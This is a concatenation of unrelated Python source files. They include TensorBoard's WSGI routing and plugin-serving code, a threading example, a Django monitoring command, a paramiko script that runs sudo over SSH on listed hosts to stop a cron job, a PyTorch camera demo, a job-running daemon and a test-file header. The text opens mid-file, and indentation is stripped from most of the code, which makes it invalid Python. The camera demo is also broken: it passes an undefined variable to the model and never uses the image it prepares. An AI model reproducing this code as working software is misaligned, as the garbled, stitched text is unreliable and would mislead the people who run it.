unordered_prefix_routes[path] = app
else:
if '*' in path:
raise ValueError('Plugin %r handles invalid route %r: Only '
'trailing wildcards are supported '
'(i.e., `/.../*`)' %
(plugin.plugin_name, path))
self.exact_routes[path] = app
# Wildcard routes will be checked in the given order, so we sort them
# longest to shortest so that a more specific route will take precedence
# over a more general one (e.g., a catchall route `/*` should come last).
self.prefix_routes = collections.OrderedDict(
sorted(
six.iteritems(unordered_prefix_routes),
key=lambda x: len(x[0]),
reverse=True))
self._app = self._create_wsgi_app()
def _create_wsgi_app(self):
"""Apply middleware to create the final WSGI app."""
app = self._route_request
app = empty_path_redirect.EmptyPathRedirectMiddleware(app)
app = experiment_id.ExperimentIdMiddleware(app)
app = path_prefix.PathPrefixMiddleware(app, self._path_prefix)
app = _handling_errors(app)
return app
@wrappers.Request.application
def _serve_plugin_entry(self, request):
"""Serves a HTML for iframed plugin entry point.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
name = request.args.get('name')
plugins = [
plugin for plugin in self._plugins if plugin.plugin_name == name]
if not plugins:
raise errors.NotFoundError(name)
if len(plugins) > 1:
      # Technically this is not possible, as plugin names are unique and
      # uniqueness is checked in __init__.
reason = (
'Plugin invariant error: multiple plugins with name '
'{name} found: {list}'
).format(name=name, list=plugins)
raise AssertionError(reason)
plugin = plugins[0]
module_path = plugin.frontend_metadata().es_module_path
if not module_path:
return http_util.Respond(
request, 'Plugin is not module loadable', 'text/plain', code=400)
    # A non-self origin is blocked by CSP, but this is a good invariant check.
if urlparse.urlparse(module_path).netloc:
raise ValueError('Expected es_module_path to be non-absolute path')
module_json = json.dumps('.' + module_path)
script_content = 'import({}).then((m) => void m.render());'.format(
module_json)
digest = hashlib.sha256(script_content.encode('utf-8')).digest()
script_sha = base64.b64encode(digest).decode('ascii')
html = textwrap.dedent("""
<!DOCTYPE html>
<head><base href="plugin/{name}/" /></head>
<body><script type="module">{script_content}</script></body>
""").format(name=name, script_content=script_content)
return http_util.Respond(
request,
html,
'text/html',
csp_scripts_sha256s=[script_sha],
)
@wrappers.Request.application
def _serve_plugins_listing(self, request):
"""Serves an object mapping plugin name to whether it is enabled.
Args:
request: The werkzeug.Request object.
Returns:
A werkzeug.Response object.
"""
response = collections.OrderedDict()
for plugin in self._plugins:
if type(plugin) is core_plugin.CorePlugin: # pylint: disable=unidiomatic-typecheck
# This plugin's existence is a backend implementation detail.
continue
start = time.time()
is_active = plugin.is_active()
elapsed = time.time() - start
logger.info(
'Plugin listing: is_active() for %s took %0.3f seconds',
plugin.plugin_name, elapsed)
plugin_metadata = plugin.frontend_metadata()
output_metadata = {
'disable_reload': plugin_metadata.disable_reload,
'enabled': is_active,
# loading_mechanism set below
'remove_dom': plugin_metadata.remove_dom,
# tab_name set below
}
if plugin_metadata.tab_name is not None:
output_metadata['tab_name'] = plugin_metadata.tab_name
else:
output_metadata['tab_name'] = plugin.plugin_name
es_module_handler = plugin_metadata.es_module_path
element_name = plugin_metadata.element_name
if element_name is not None and es_module_handler is not None:
logger.error(
'Plugin %r declared as both legacy and iframed; skipping',
plugin.plugin_name,
)
continue
elif element_name is not None and es_module_handler is None:
loading_mechanism = {
'type': 'CUSTOM_ELEMENT',
'element_name': element_name,
}
elif element_name is None and es_module_handler is not None:
loading_mechanism = {
'type': 'IFRAME',
'module_path': ''.join([
request.script_root, DATA_PREFIX, PLUGIN_PREFIX, '/',
plugin.plugin_name, es_module_handler,
]),
}
else:
# As a compatibility measure (for plugins that we don't
# control), we'll pull it from the frontend registry for now.
loading_mechanism = {
'type': 'NONE',
}
output_metadata['loading_mechanism'] = loading_mechanism
response[plugin.plugin_name] = output_metadata
return http_util.Respond(request, response, 'application/json')
def __call__(self, environ, start_response):
"""Central entry point for the TensorBoard application.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
return self._app(environ, start_response)
def _route_request(self, environ, start_response):
"""Delegate an incoming request to sub-applications.
This method supports strict string matching and wildcard routes of a
single path component, such as `/foo/*`. Other routing patterns,
like regular expressions, are not supported.
This is the main TensorBoard entry point before middleware is
applied. (See `_create_wsgi_app`.)
Args:
environ: See WSGI spec (PEP 3333).
start_response: See WSGI spec (PEP 3333).
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
clean_path = _clean_path(parsed_url.path)
# pylint: disable=too-many-function-args
if clean_path in self.exact_routes:
return self.exact_routes[clean_path](environ, start_response)
else:
for path_prefix in self.prefix_routes:
if clean_path.startswith(path_prefix):
return self.prefix_routes[path_prefix](environ, start_response)
logger.warn('path %s not found, sending 404', clean_path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)(
environ, start_response)
# pylint: enable=too-many-function-args
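# Routing note (illustrative sketch, not TensorBoard API): requests are matched
# against self.exact_routes first, then against self.prefix_routes, whose
# wildcard ("/*") entries were sorted longest-first so a specific prefix always
# wins over a catch-all. A standalone demonstration of that ordering:
def _prefix_route_order_example():
  unordered = {'/data/plugin/scalars/': 'scalars_app', '/': 'catchall_app'}
  ordered = collections.OrderedDict(
      sorted(six.iteritems(unordered), key=lambda x: len(x[0]), reverse=True))
  # Iteration now yields '/data/plugin/scalars/' before '/', mirroring the
  # order in which _route_request() tries self.prefix_routes.
  return list(ordered)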
def parse_event_files_spec(logdir_spec):
"""Parses `logdir_spec` into a map from paths to run group names.
The `--logdir_spec` flag format is a comma-separated list of path
specifications. A path spec looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a spec
with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
    logdir_spec: A comma-separated list of run specifications.
  Returns:
    A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
    Groups without an explicit name are named after their path. If `logdir_spec`
    is None, returns an empty dict, which is helpful for testing things that
    don't require any valid runs.
"""
files = {}
if logdir_spec is None:
return files
  # Make sure this stays consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir_spec.split(','):
    # Check if the spec contains a group. A spec starting with xyz:// is
    # treated as a URI path spec rather than a group spec. If the spec looks
    # like /foo:bar/baz, we assume it's a path with a colon. If the spec looks
    # like [a-zA-Z]:\foo we assume it's a Windows drive path, not a
    # single-letter group.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/' and not os.path.splitdrive(specification)[0]):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(os.path.expanduser(path))
files[path] = run_name
return files
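# Illustrative examples of the spec parsing above (comments only, not executed;
# the exact realpath expansion depends on the local filesystem):
#
#   parse_event_files_spec('/tmp/runs')
#     -> {'/tmp/runs': None}                        # unnamed group
#   parse_event_files_spec('train:/tmp/a,eval:/tmp/b')
#     -> {'/tmp/a': 'train', '/tmp/b': 'eval'}      # named groups
#   parse_event_files_spec('gs://bucket/logs')
#     -> {'gs://bucket/logs': None}                 # URI paths are kept as-is
#   parse_event_files_spec('/foo:bar/baz')
#     -> {'/foo:bar/baz': None}                     # leading '/' means no group name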
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval,
reload_task):
"""Starts automatically reloading the given multiplexer.
If `load_interval` is positive, the thread will reload the multiplexer
by calling `ReloadMultiplexer` every `load_interval` seconds, starting
immediately. Otherwise, reloads the multiplexer once and never again.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: An integer greater than or equal to 0. If positive, how many
seconds to wait after one load before starting the next load. Otherwise,
reloads the multiplexer once and never again (no continuous reloading).
reload_task: Indicates the type of background task to reload with.
Raises:
ValueError: If `load_interval` is negative.
"""
if load_interval < 0:
raise ValueError('load_interval is negative: %d' % load_interval)
def _reload():
while True:
start = time.time()
logger.info('TensorBoard reload process beginning')
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logger.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logger.info('TensorBoard done reloading. Load took %0.3f secs', duration)
if load_interval == 0:
# Only load the multiplexer once. Do not continuously reload.
break
time.sleep(load_interval)
if reload_task == 'process':
logger.info('Launching reload in a child process')
import multiprocessing
process = multiprocessing.Process(target=_reload, name='Reloader')
# Best-effort cleanup; on exit, the main TB parent process will attempt to
# kill all its daemonic children.
process.daemon = True
process.start()
elif reload_task in ('thread', 'auto'):
logger.info('Launching reload in a daemon thread')
thread = threading.Thread(target=_reload, name='Reloader')
# Make this a daemon thread, which won't block TB from exiting.
thread.daemon = True
thread.start()
elif reload_task == 'blocking':
if load_interval != 0:
raise ValueError('blocking reload only allowed with load_interval=0')
_reload()
else:
raise ValueError('unrecognized reload_task: %s' % reload_task)
def create_sqlite_connection_provider(db_uri):
"""Returns function that returns SQLite Connection objects.
Args:
db_uri: A string URI expressing the DB file, e.g. "sqlite:~/tb.db".
Returns:
A function that returns a new PEP-249 DB Connection, which must be closed,
each time it is called.
Raises:
ValueError: If db_uri is not a valid sqlite file URI.
"""
uri = urlparse.urlparse(db_uri)
if uri.scheme != 'sqlite':
raise ValueError('Only sqlite DB URIs are supported: ' + db_uri)
if uri.netloc:
raise ValueError('Can not connect to SQLite over network: ' + db_uri)
if uri.path == ':memory:':
raise ValueError('Memory mode SQLite not supported: ' + db_uri)
path = os.path.expanduser(uri.path)
params = _get_connect_params(uri.query)
# TODO(@jart): Add thread-local pooling.
return lambda: sqlite3.connect(path, **params)
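# Usage sketch for the provider above (assumed example URI; comments only, not
# executed here):
#
#   provider = create_sqlite_connection_provider('sqlite:~/tb.db')
#   conn = provider()            # each call opens a fresh PEP-249 connection
#   try:
#       conn.execute('SELECT 1')
#   finally:
#       conn.close()             # callers are responsible for closing it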
def _get_connect_params(query):
params = urlparse.parse_qs(query)
  if any(len(v) > 1 for v in params.values()):
raise ValueError('DB URI params list has duplicate keys: ' + query)
return {k: json.loads(v[0]) for k, v in params.items()}
def _clean_path(path):
"""Removes a trailing slash from a non-root path.
Arguments:
path: The path of a request.
Returns:
The route to use to serve the request.
"""
if path != '/' and path.endswith('/'):
return path[:-1]
return path
def _get_event_file_active_filter(flags):
"""Returns a predicate for whether an event file load timestamp is active.
Returns:
A predicate function accepting a single UNIX timestamp float argument, or
None if multi-file loading is not enabled.
"""
if not flags.reload_multifile:
return None
inactive_secs = flags.reload_multifile_inactive_secs
if inactive_secs == 0:
return None
if inactive_secs < 0:
return lambda timestamp: True
return lambda timestamp: timestamp + inactive_secs >= time.time()
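# Added summary of the branches above (illustrative): multi-file loading off or
# reload_multifile_inactive_secs == 0 -> None (no filtering at all);
# inactive_secs < 0 -> every file is treated as active; otherwise a file is
# active if its load timestamp is within `inactive_secs` seconds of now.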
class _DbModeMultiplexer(event_multiplexer.EventMultiplexer):
"""Shim EventMultiplexer to use when in read-only DB mode.
In read-only DB mode, the EventMultiplexer is nonfunctional - there is no
logdir to reload, and the data is all exposed via SQL. This class represents
the do-nothing EventMultiplexer for that purpose, which serves only as a
conduit for DB-related parameters.
The load APIs raise exceptions if called, and the read APIs always
return empty results.
"""
def __init__(self, db_uri, db_connection_provider):
"""Constructor for `_DbModeMultiplexer`.
Args:
db_uri: A URI to the database file in use.
db_connection_provider: Provider function for creating a DB connection.
"""
logger.info('_DbModeMultiplexer initializing for %s', db_uri)
super(_DbModeMultiplexer, self).__init__()
self.db_uri = db_uri
self.db_connection_provider = db_connection_provider
logger.info('_DbModeMultiplexer done initializing')
def AddRun(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def AddRunsFromDirectory(self, path, name=None):
"""Unsupported."""
raise NotImplementedError()
def Reload(self):
"""Unsupported."""
raise NotImplementedError()
def make_plugin_loader(plugin_spec):
"""Returns a plugin loader for the given plugin.
Args:
plugin_spec: A TBPlugin subclass, or a TBLoader instance or subclass.
Returns:
A TBLoader for the given plugin.
"""
if isinstance(plugin_spec, base_plugin.TBLoader):
return plugin_spec
if isinstance(plugin_spec, type):
if issubclass(plugin_spec, base_plugin.TBLoader):
return plugin_spec()
if issubclass(plugin_spec, base_plugin.TBPlugin):
return base_plugin.BasicLoader(plugin_spec)
raise TypeError("Not a TBLoader or TBPlugin subclass: %r" % (plugin_spec,))
|
example2.py
|
import threading
import random
import time
def update():
global counter
with count_lock:
current_counter = counter # reading in shared resource
time.sleep(random.randint(0, 1)) # simulating heavy calculations
counter = current_counter + 1
counter = 0
count_lock = threading.Lock()
threads = [threading.Thread(target=update) for i in range(20)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
print(f"Final counter: {counter}.")
print("Finished.")
|
monitor-cloud.py
|
from threading import Thread
import time
from django.core.management.base import BaseCommand
from clouds.models import Instance
class Command(BaseCommand):
    help = 'monitor cloud resources periodically'
def handle(self, *args, **options):
while True:
for instance in Instance.objects.exclude(uuid=None):
Thread(target=instance.monitor).start()
time.sleep(0.1)
time.sleep(300)
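# Added commentary: each sweep starts one fire-and-forget thread per instance,
# pausing 0.1 s between starts, then the command sleeps 300 s before the next
# sweep. Nothing joins the threads, so a slow instance.monitor() call from one
# sweep can still be running when the next sweep starts another thread for the
# same instance.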
|
stopcron.py
|
#!/usr/bin/python
import argparse
import getpass
import os
import sys
import paramiko
import socket
import Queue
import threading
import time
def sshStopCron(retry,hostname):
global user
global password
if retry == 0:
print "Stop Cron Failed in", hostname
q.task_done()
return
try:
s = paramiko.SSHClient()
s.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if os.path.isfile(password) == True:
s.connect(hostname, username=user, key_filename = password, timeout=60)
else:
s.connect(hostname, username=user, password = password, timeout=60)
transport = s.get_transport()
session = transport.open_session()
session.set_combine_stderr(True)
session.get_pty()
command = "sudo mv /etc/cron.d/ifagent InsightAgent-master/ifagent."+time.strftime("%Y%m%d%H%M%S")+"\n"
session.exec_command(command)
stdin = session.makefile('wb', -1)
stdout = session.makefile('rb', -1)
stdin.write(password+'\n')
stdin.flush()
session.recv_exit_status() #wait for exec_command to finish
s.close()
print "Stopped Cron in ", hostname
q.task_done()
return
except paramiko.SSHException, e:
print "Invalid Username/Password for %s:"%hostname , e
return sshStopCron(retry-1,hostname)
except paramiko.AuthenticationException:
print "Authentication failed for some reason in %s:"%hostname
return sshStopCron(retry-1,hostname)
except socket.error, e:
print "Socket connection failed in %s:"%hostname, e
return sshStopCron(retry-1,hostname)
def get_args():
parser = argparse.ArgumentParser(
description='Script retrieves arguments for stopping insightfinder agent.')
parser.add_argument(
'-n', '--USER_NAME_IN_HOST', type=str, help='User Name in Hosts', required=True)
parser.add_argument(
'-p', '--PASSWORD', type=str, help='Password for hosts', required=True)
args = parser.parse_args()
user = args.USER_NAME_IN_HOST
password = args.PASSWORD
return user, password
if __name__ == '__main__':
hostfile="hostlist.txt"
q = Queue.Queue()
user, password = get_args()
try:
with open(os.getcwd()+"/"+hostfile, 'rb') as f:
while True:
line = f.readline()
if line:
host=line.split("\n")[0]
q.put(host)
else:
break
while q.empty() != True:
host = q.get()
t = threading.Thread(target=sshStopCron, args=(3,host,))
t.daemon = True
t.start()
q.join()
except (KeyboardInterrupt, SystemExit):
print "Keyboard Interrupt!!"
sys.exit()
except IOError as e:
print "I/O error({0}): {1}: {2}".format(e.errno, e.strerror, e.filename)
sys.exit()
|
multiprocess.py
|
import torch.multiprocessing as mp
import keyboard
from PIL import Image
import torchvision
from base import *
from test import Time_counter
import _init_paths
from utils.demo_utils import OpenCVCapture, Open3d_visualizer
class Multiprocess(Base):
def __init__(self):
self.run_single_camera()
def set_up_model_pool(self):
self.model_pool = []
for i in range(self.model_number):
self.model_pool.append(Base())
def single_image_forward(self,image):
image_size = image.shape[:2][::-1]
image_org = Image.fromarray(image)
        resized_image_size = (float(self.input_size)/max(image_size) * np.array(image_size) // 2 * 2).astype(int)[::-1]
padding = tuple((self.input_size-resized_image_size)[::-1]//2)
transform = torchvision.transforms.Compose([
torchvision.transforms.Resize(resized_image_size, interpolation=3),
torchvision.transforms.Pad(padding, fill=0, padding_mode='constant'),
])
image = torch.from_numpy(np.array(transform(image_org))).unsqueeze(0).cuda().contiguous().float()
outputs = self.net_forward(meta_data, cfg=self.demo_cfg)
return outputs
def image_put(self, q):
self.capture = OpenCVCapture()
time.sleep(3)
while True:
if q.qsize() > 2:
q.get()
q.put(self.capture.read())
def image_get(self, q, q_vis):
super(Multiprocess, self).__init__()
self._build_model_()
self.generator.eval()
for i in range(10):
self.single_image_forward(np.zeros((512,512,3)).astype(np.uint8))
while True:
try:
frame = q.get()
with torch.no_grad():
outputs = self.single_image_forward(frame)
q_vis.put((frame,outputs))
except Exception as error:
print(error)
self.endprocess()
def show_results(self, q):
'''
17.5 FPS of entire process on 1080
'''
self.visualizer = Open3d_visualizer()
self.counter = Time_counter(thresh=0.1)
time.sleep(4)
start_flag = 1
while True:
try:
if start_flag:
self.counter.start()
frame,outputs = q.get()
start_flag=0
break_flag = self.visualize(frame,outputs)
self.counter.count()
self.counter.fps()
if break_flag:
self.endprocess()
except Exception as error:
print(error)
#self.endprocess()
def visualize(self,frame,outputs):
verts = outputs['verts'][0].cpu().numpy()
verts = verts * 50 + np.array([0, 0, 100])
break_flag = self.visualizer.run(verts,frame)
return break_flag
def run_single_camera(self):
queue = mp.Queue(maxsize=3)
queue_vis = mp.Queue(maxsize=3)
self.processes = [mp.Process(target=self.image_put, args=(queue,)),
mp.Process(target=self.image_get, args=(queue,queue_vis,)),
mp.Process(target=self.show_results, args=(queue_vis,))]
[process.start() for process in self.processes]
[process.join() for process in self.processes]
def endprocess(self):
[process.terminate() for process in self.processes]
[process.join() for process in self.processes]
def main():
mulp = Multiprocess()
mulp.run_single_camera()
if __name__ == '__main__':
main()
|
daemon.py
|
#!/usr/bin/env python3
# -*- coding: iso-8859-1 -*-
############################################################################
# #
# Copyright (c) 2017 eBay Inc. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# #
############################################################################
from __future__ import print_function
from __future__ import division
from web import ThreadedHTTPServer, ThreadedUnixHTTPServer, BaseWebHandler
import sys
import argparse
import socket
import traceback
import signal
import os
import control
import configfile
import resource
import autoflush
import time
from stat import S_ISSOCK
from threading import Thread, Lock as TLock, Lock as JLock
from string import ascii_letters
import random
import atexit
from compat import unicode
from extras import json_encode, json_decode, DotDict
from dispatch import JobError
from status import statmsg_sink, children, print_status_stacks, status_stacks_export
DEBUG_WRITE_JSON = False
def gen_cookie(size=16):
return ''.join(random.choice(ascii_letters) for _ in range(size))
# This contains cookie: {lock, last_error, last_time} for all jobs, main jobs have cookie None.
job_tracking = {None: DotDict(lock=JLock(), last_error=None, last_time=0)}
# This needs .ctrl to work. It is set from main()
class XtdHandler(BaseWebHandler):
server_version = "scx/0.1"
DEBUG = not True
def log_message(self, format, *args):
return
def encode_body(self, body):
if isinstance(body, bytes):
return body
if isinstance(body, unicode):
return body.encode('utf-8')
return json_encode(body)
def handle_req(self, path, args):
if self.DEBUG: print("@daemon.py: Handle_req, path = \"%s\", args = %s" %( path, args ), file=sys.stderr)
try:
self._handle_req( path, args )
except Exception:
traceback.print_exc()
self.do_response(500, "text/plain", "ERROR")
def _handle_req(self, path, args):
if path[0] == 'status':
data = job_tracking.get(args.get('subjob_cookie') or None)
if not data:
self.do_response(500, 'text/plain', 'bad subjob_cookie!\n' )
return
timeout = min(float(args.get('timeout', 0)), 128)
status = DotDict(idle=data.lock.acquire(False))
deadline = time.time() + timeout
while not status.idle and time.time() < deadline:
time.sleep(0.1)
status.idle = data.lock.acquire(False)
if status.idle:
if data.last_error:
status.last_error = data.last_error
data.last_error = None
else:
status.last_time = data.last_time
data.lock.release()
elif path == ['status', 'full']:
status.status_stacks, status.current = status_stacks_export()
self.do_response(200, "text/json", status)
return
elif path==['list_workspaces']:
ws = {k: v.path for k, v in self.ctrl.list_workspaces().items()}
self.do_response(200, "text/json", ws)
elif path==['config']:
self.do_response(200, "text/json", self.ctrl.config)
elif path==['update_methods']:
self.do_response(200, "text/json", self.ctrl.update_methods())
elif path==['methods']:
""" return a json with everything the Method object knows about the methods """
self.do_response(200, "text/json", self.ctrl.get_methods())
elif path[0]=='method_info':
method = path[1]
self.do_response(200, "text/json", self.ctrl.method_info(method))
elif path[0]=='set_workspace':
_ws = path[1]
if _ws not in self.ctrl.list_workspaces():
self.do_response(500,'text/plain', 'Undefined workspace \"%s\"\n' % _ws)
else:
self.ctrl.set_workspace(_ws)
self.do_response(200,'text/plain', 'Workspace set to \"%s\"\n' % _ws)
elif path[0]=='workspace_info':
self.do_response(200, 'text/json', self.ctrl.get_workspace_details())
elif path[0] == 'abort':
tokill = list(children)
print('Force abort', tokill)
for child in tokill:
os.killpg(child, signal.SIGKILL)
self.do_response(200, 'text/json', {'killed': len(tokill)})
elif path==['submit']:
if self.ctrl.broken:
self.do_response(500, "text/json", {'broken': self.ctrl.broken, 'error': 'Broken methods: ' + ', '.join(sorted(m.split('.')[-1][2:] for m in self.ctrl.broken))})
elif 'xml' in args:
self.do_response(500, 'text/plain', 'JSON > XML!\n' )
elif 'json' in args:
if DEBUG_WRITE_JSON:
with open('DEBUG_WRITE.json', 'wb') as fh:
fh.write(args['json'])
setup = json_decode(args['json'])
data = job_tracking.get(setup.get('subjob_cookie') or None)
if not data:
self.do_response(500, 'text/plain', 'bad subjob_cookie!\n' )
return
if len(job_tracking) - 1 > 5: # max five levels
print('Too deep subjob nesting!')
self.do_response(500, 'text/plain', 'Too deep subjob nesting')
return
if data.lock.acquire(False):
respond_after = True
try:
if self.DEBUG: print('@daemon.py: Got the lock!', file=sys.stderr)
jobidv, job_res = self.ctrl.initialise_jobs(setup)
job_res['done'] = False
if jobidv:
error = []
tlock = TLock()
link2job = {j['link']: j for j in job_res['jobs'].values()}
def run(jobidv, tlock):
for jobid in jobidv:
passed_cookie = None
# This is not a race - all higher locks are locked too.
while passed_cookie in job_tracking:
passed_cookie = gen_cookie()
job_tracking[passed_cookie] = DotDict(lock=JLock(), last_error=None, last_time=0)
try:
self.ctrl.run_job(jobid, subjob_cookie=passed_cookie, parent_pid=setup.get('parent_pid', 0))
# update database since a new jobid was just created
job = self.ctrl.add_single_jobid(jobid)
with tlock:
link2job[jobid]['make'] = 'DONE'
link2job[jobid]['total_time'] = job.total
except JobError as e:
error.append([e.jobid, e.method, e.status])
with tlock:
link2job[jobid]['make'] = 'FAIL'
return
finally:
del job_tracking[passed_cookie]
# everything was built ok, update symlink
try:
wn = self.ctrl.current_workspace
dn = self.ctrl.workspaces[wn].path
ln = os.path.join(dn, wn + "-LATEST_")
try:
os.unlink(ln)
except OSError:
pass
os.symlink(jobid, ln)
os.rename(ln, os.path.join(dn, wn + "-LATEST"))
except Exception:
pass # meh
t = Thread(target=run, name="job runner", args=(jobidv, tlock,))
t.daemon = True
t.start()
t.join(2) # give job two seconds to complete
with tlock:
for j in link2job.values():
if j['make'] in (True, 'FAIL',):
respond_after = False
job_res_json = json_encode(job_res)
break
if not respond_after: # not all jobs are done yet, give partial response
self.do_response(200, "text/json", job_res_json)
t.join() # wait until actually complete
del tlock
del t
# verify that all jobs got built.
total_time = 0
for j in link2job.values():
jobid = j['link']
if j['make'] == True:
# Well, crap.
error.append([jobid, "unknown", {"INTERNAL": "Not built"}])
print("INTERNAL ERROR IN JOB BUILDING!", file=sys.stderr)
total_time += j.get('total_time', 0)
data.last_error = error
data.last_time = total_time
except Exception as e:
if respond_after:
self.do_response(500, "text/json", {'error': str(e)})
raise
finally:
data.lock.release()
if respond_after:
job_res['done'] = True
self.do_response(200, "text/json", job_res)
if self.DEBUG: print("@daemon.py: Process releases lock!", file=sys.stderr) # note: has already done http response
else:
self.do_response(200, 'text/plain', 'Busy doing work for you...\n')
else:
self.do_response(500, 'text/plain', 'Missing json input!\n' )
else:
self.do_response(500, 'text/plain', 'Unknown path\n' )
return
def parse_args(argv):
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--debug', action='store_true')
parser.add_argument('--config', default='../conf/framework.conf', metavar='CONFIG_FILE', help='Configuration file')
group = parser.add_mutually_exclusive_group()
group.add_argument('--port', type=int, help='Listen on tcp port')
group.add_argument('--socket', help='Listen on unix socket', default='socket.dir/default')
return parser.parse_args(argv)
def exitfunction(*a):
signal.signal(signal.SIGTERM, signal.SIG_IGN)
signal.signal(signal.SIGINT, signal.SIG_IGN)
print()
print('The daemon deathening! %d %s' % (os.getpid(), children,))
print()
for child in children:
os.killpg(child, signal.SIGKILL)
os.killpg(os.getpgid(0), signal.SIGKILL)
os._exit(1) # we really should be dead already
def check_socket(fn):
dn = os.path.dirname(fn)
try:
os.mkdir(dn, 0o750)
except OSError:
pass
try:
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(fn)
except socket.error:
try:
assert S_ISSOCK(os.lstat(fn).st_mode), fn + " exists as non-socket"
os.unlink(fn)
except OSError:
pass
return
raise Exception("Socket %s already listening" % (fn,))
def siginfo(sig, frame):
print_status_stacks()
def main(options):
# all forks belong to the same happy family
try:
os.setpgrp()
except OSError:
print("Failed to create process group - there is probably already one (daemontools).", file=sys.stderr)
# Set a low (but not too low) open file limit to make
# dispatch.update_valid_fds faster.
# The runners will set the highest limit they can
# before actually running any methods.
r1, r2 = resource.getrlimit(resource.RLIMIT_NOFILE)
r1 = min(r1, r2, 1024)
resource.setrlimit(resource.RLIMIT_NOFILE, (r1, r2))
# setup statmsg sink and tell address using ENV
statmsg_rd, statmsg_wr = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
os.environ['BD_STATUS_FD'] = str(statmsg_wr.fileno())
def buf_up(fh, opt):
sock = socket.fromfd(fh.fileno(), socket.AF_UNIX, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, opt, 256 * 1024)
buf_up(statmsg_wr, socket.SO_SNDBUF)
buf_up(statmsg_rd, socket.SO_RCVBUF)
CONFIG = configfile.get_config(options.config, verbose=False)
t = Thread(target=statmsg_sink, args=(CONFIG['logfilename'], statmsg_rd), name="statmsg sink")
t.daemon = True
t.start()
# do all main-stuff, i.e. run server
sys.stdout = autoflush.AutoFlush(sys.stdout)
sys.stderr = autoflush.AutoFlush(sys.stderr)
atexit.register(exitfunction)
signal.signal(signal.SIGTERM, exitfunction)
signal.signal(signal.SIGINT, exitfunction)
signal.signal(signal.SIGUSR1, siginfo)
signal.siginterrupt(signal.SIGUSR1, False)
if hasattr(signal, 'SIGINFO'):
signal.signal(signal.SIGINFO, siginfo)
signal.siginterrupt(signal.SIGINFO, False)
if options.port:
server = ThreadedHTTPServer(('', options.port), XtdHandler)
daemon_url = 'http://localhost:%d' % (options.port,)
else:
check_socket(options.socket)
# We want the socket to be world writeable, protect it with dir permissions.
u = os.umask(0)
server = ThreadedUnixHTTPServer(options.socket, XtdHandler)
os.umask(u)
daemon_url = configfile.resolve_socket_url(options.socket)
ctrl = control.Main(options, daemon_url)
print()
ctrl.print_workspaces()
print()
XtdHandler.ctrl = ctrl
for n in ("result_directory", "source_directory", "urd"):
print("%16s: %s" % (n.replace("_", " "), CONFIG.get(n),))
print()
if options.port:
serving_on = "port %d" % (options.port,)
else:
serving_on = options.socket
print("Serving on %s\n" % (serving_on,), file=sys.stderr)
server.serve_forever()
if __name__ == "__main__":
# sys.path needs to contain .. (the project dir), put it after accelerator
sys.path.insert(1, os.path.dirname(sys.path[0]))
options = parse_args(sys.argv[1:])
main(options)
|
test_pypi.py
|
# The piwheels project
# Copyright (c) 2017 Ben Nuttall <https://github.com/bennuttall>
# Copyright (c) 2017 Dave Jones <dave@waveform.org.uk>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from time import sleep
from unittest import mock
from random import randint
from datetime import datetime, timezone
from threading import Thread
from socketserver import ThreadingMixIn
